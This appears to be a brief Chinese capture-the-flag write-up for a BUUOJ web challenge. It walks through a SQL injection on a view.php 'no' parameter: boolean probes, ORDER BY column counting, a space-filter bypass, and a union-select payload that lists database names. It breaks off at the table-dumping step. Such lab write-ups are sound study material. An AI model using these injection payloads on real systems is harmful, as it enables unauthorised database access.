1.在注册后发现这个界面,猜测是不是存在注入点
http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3.buuoj.cn/view.php?no=1and1 http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3.buuoj.cn/view.php?no=1and0
2.order by得到长度为4(这里存在对空格的过滤)
3.爆库名
/view.php?no=-1++union++select++1,group_concat(schema_name),3,4++from++information_schema.schemata--+
4.爆表名